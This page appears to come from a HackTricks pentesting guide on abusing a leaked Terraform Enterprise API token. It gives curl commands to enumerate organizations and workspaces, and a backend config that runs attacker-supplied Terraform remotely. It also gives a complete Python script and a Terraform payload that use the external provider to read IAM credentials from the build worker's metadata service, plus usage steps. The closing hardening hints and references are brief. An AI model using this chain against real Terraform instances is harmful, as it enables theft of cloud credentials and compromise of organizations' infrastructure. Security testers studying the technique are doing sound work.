Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Terraform Enterprise is HashiCorp's self-hosted distribution of Terraform Cloud. It offers enterprises a private instance of the Terraform Cloud application, with no resource limits and with additional enterprise-grade architectural features like audit logging and SAML single sign-on.
"By default, Terraform Enterprise does not prevent Terraform operations from accessing the instance metadata service, which may contain IAM credentials or other sensitive data" (source)
{% hint style="info" %} While the focus of this article is on targeting the metadata service, it is worth noting that gaining code execution inside a Terraform run may provide other avenues for attack. For example, environment variables could be leaked which may contain sensitive credentials. {% endhint %}
Terraform Cloud runs Terraform on disposable virtual machines in its own cloud infrastructure by default. You can leverage Terraform Cloud Agents to run Terraform on your own isolated, private, or on-premises infrastructure. Remote Terraform execution is sometimes referred to as "remote operations."
Therefore, a leaked API token for a Terraform Enterprise instance lets you start a run in any workspace it can reach; when that workspace's execution mode is `remote` (or `agent`), the Terraform code you supply is executed on the instance's build worker (or on the organization's own agent) rather than on your machine, which gives you arbitrary code execution on that host.
Terraform API tokens can be identified by the `.atlasv1.` substring. On a workstation they are usually stored in `~/.terraform.d/credentials.tfrc.json` (written by `terraform login`), but when attacking CI/CD platforms and cloud accounts you may also find them in secret stores or in environment variables (Terraform itself reads them from `TF_TOKEN_<hostname>`, with the dots of the hostname replaced by underscores).
You can use this token to list the organizations it has access to (the `id` of each entry is the organization name used in the following URLs):

```bash
curl -H "Authorization: Bearer $TERRAFORM_ENTERPRISE_TOKEN" https://<terra_enterprise_inst>/api/v2/organizations | jq
```

and with that name list the workspaces (the `execution-mode` attribute of each workspace tells you whether its runs execute remotely, on an agent, or only locally):

```bash
curl -H "Authorization: Bearer $TERRAFORM_ENTERPRISE_TOKEN" https://<terra_enterprise_inst>/api/v2/organizations/<org-name>/workspaces | jq
```
Now you need a backend configuration that points Terraform at the Enterprise instance. Take this example and replace the placeholders with the hostname of the Terraform Enterprise instance and the organization and workspace names found above:
{% code title="backend_config.tf" %}
```hcl
terraform {
  backend "remote" {
    hostname     = "{{TFE_HOSTNAME}}"
    organization = "{{ORGANIZATION_NAME}}"
    workspaces {
      name = "{{WORKSPACE_NAME}}"
    }
  }
}
```
{% endcode %}
Initialise Terraform against that backend, passing the Enterprise token as backend configuration:

```bash
terraform init -backend-config="token=$TERRAFORM_ENTERPRISE_TOKEN"
# Check that it was correctly initialised (an authentication error here means the token or the backend config is wrong)
terraform state list
```
Now that Terraform is configured to talk to the Enterprise backend, every `terraform plan` or `terraform apply` you start is executed remotely, so you can just follow the section RCE in Terraform from:
{% content-ref url="./" %} . {% endcontent-ref %}
As mentioned above, Terraform Enterprise runs may execute on the instance's own build workers or, via agents, on any machine or cloud provider the organization chose. Therefore, if you can execute code inside a run, you can gather cloud credentials from the metadata endpoint of the host it runs on (IAM role credentials, user data...).
Moreover, check the filesystem and environment variables of that host for other potential secrets and API keys.
Also, don't forget to check the network where the machine is located: agents are typically placed inside private or on-premises networks precisely so that Terraform can reach internal resources.
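As an added example (not code from this page, from HackTricks or from HashiCorp), the following Python script strings the steps above together: it spots `.atlasv1.` tokens in a blob of text, lists the organizations and the workspaces whose runs execute off the workstation, renders the `backend_config.tf` shown above with the placeholders filled in, and renders a `main.tf` payload that reads the build worker's instance metadata during `plan`. The hostname `tfe.example.internal`, the embedded sample API responses and the AWS-style IMDSv1 endpoint are assumptions made for the example.

```python
#!/usr/bin/env python3
"""Added example for this page (not HackTricks' or HashiCorp's code).

Walk the Terraform Enterprise v2 API with a leaked token, pick a workspace
whose runs execute off the workstation, and render the backend config plus
a Terraform payload that reads the build worker's instance metadata.
Assumptions: the token can read the organization, the worker reaches an
AWS-style IMDSv1 at 169.254.169.254 and has curl/base64 installed, and
nothing (e.g. a Sentinel policy) blocks the hashicorp/external provider.
"""
import json
import re
import urllib.request

# The text only tells us tokens contain ".atlasv1."; no length is assumed.
ATLAS_TOKEN_RE = re.compile(r"[A-Za-z0-9]+\.atlasv1\.[A-Za-z0-9]+")


def find_tokens(text):
    """Return every TFE/TFC-looking token in a blob (env dump, CI log, file)."""
    return ATLAS_TOKEN_RE.findall(text)


def tfe_get(host, token, path):
    """GET a v2 API path with bearer auth and return the decoded JSON (network)."""
    req = urllib.request.Request(
        f"https://{host}/api/v2{path}",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/vnd.api+json"},
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def org_names(orgs_json):
    """/organizations: each data[].id is the organization name used in URLs."""
    return [o["id"] for o in orgs_json.get("data", [])]


def runnable_workspaces(ws_json):
    """/organizations/<org>/workspaces: keep workspaces whose runs execute on
    the TFE build workers ("remote") or on the org's own agents ("agent").
    A "local" workspace only stores state, so nothing ever runs server-side."""
    found = []
    for ws in ws_json.get("data", []):
        attrs = ws["attributes"]
        mode = attrs.get("execution-mode", "remote")
        if mode != "local":
            found.append((attrs["name"], mode))
    return found


def render_backend_config(host, org, workspace):
    """backend_config.tf from the text with the placeholders filled in."""
    return (
        "terraform {\n"
        '  backend "remote" {\n'
        f'    hostname     = "{host}"\n'
        f'    organization = "{org}"\n'
        "    workspaces {\n"
        f'      name = "{workspace}"\n'
        "    }\n"
        "  }\n"
        "}\n"
    )


def render_imds_payload(base="http://169.254.169.254/latest/meta-data/iam/security-credentials"):
    """main.tf: the external data source runs a shell snippet on the build worker
    during *plan*, so `terraform plan` alone prints the result (no apply, no state
    change). The JSON object the snippet prints becomes data.external.imds.result;
    the credentials are base64-encoded so the JSON stays valid."""
    return f'''data "external" "imds" {{
  program = ["/bin/sh", "-c", <<-EOT
    base={base}
    role=$(curl -s -m 3 "$base/" | head -n 1)
    creds=$(curl -s -m 3 "$base/$role" | base64 | tr -d '\\n')
    printf '{{"role":"%s","creds_b64":"%s"}}' "$role" "$creds"
  EOT
  ]
}}

output "imds" {{
  value = data.external.imds.result
}}
'''


# Constructed sample API responses (shape of the real v2 API, fictitious data).
SAMPLE_ORGS = {"data": [{"id": "acme", "type": "organizations",
                         "attributes": {"name": "acme"}}]}
SAMPLE_WS = {"data": [
    {"id": "ws-1", "type": "workspaces",
     "attributes": {"name": "prod-network", "execution-mode": "remote"}},
    {"id": "ws-2", "type": "workspaces",
     "attributes": {"name": "state-only", "execution-mode": "local"}},
    {"id": "ws-3", "type": "workspaces",
     "attributes": {"name": "edge", "execution-mode": "agent"}},
]}

if __name__ == "__main__":
    import sys
    host, token = sys.argv[1], sys.argv[2]  # e.g. tfe.example.internal <token>
    for org in org_names(tfe_get(host, token, "/organizations")):
        ws_json = tfe_get(host, token, f"/organizations/{org}/workspaces")
        for name, mode in runnable_workspaces(ws_json):
            print(f"{org}/{name} executes runs in {mode} mode")
```

Usage: put the two rendered files into an empty directory, run `terraform init -backend-config="token=$TERRAFORM_ENTERPRISE_TOKEN"` and then `terraform plan`; the `imds` output in the streamed run log carries the role name and the base64-encoded credentials. Where IMDSv2 is enforced the v1 path returns 401 and a session token is needed first, Azure and GCP expose metadata at different URLs and require extra headers, and a TFE instance that has applied the "restrict build worker metadata access" hardening from the references below will simply time out.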
{% hint style="info" %}
Many of Terraform Cloud's features rely on remote execution and are not available when using local operations. This includes features like Sentinel policy enforcement, cost estimation, and notifications.
You can disable remote operations for any workspace by changing its Execution Mode to Local. This causes the workspace to act only as a remote backend for Terraform state, with all execution occurring on your own workstations or continuous integration workers. {% endhint %}
{% hint style="info" %} Restrict Terraform Build Worker Metadata Access
By default, Terraform Enterprise does not prevent Terraform operations from accessing the instance metadata service, which may contain IAM credentials or other sensitive data. Refer to AWS, Azure, or Google Cloud documentation for more information on this service. {% endhint %}
- https://developer.hashicorp.com/terraform/enterprise
- https://developer.hashicorp.com/terraform/cloud-docs/run/remote-operations#disabling-remote-operations
- https://hackingthe.cloud/terraform/terraform_enterprise_metadata_service/
- https://developer.hashicorp.com/terraform/enterprise/system-overview/security-model#restrict-terraform-build-worker-metadata-access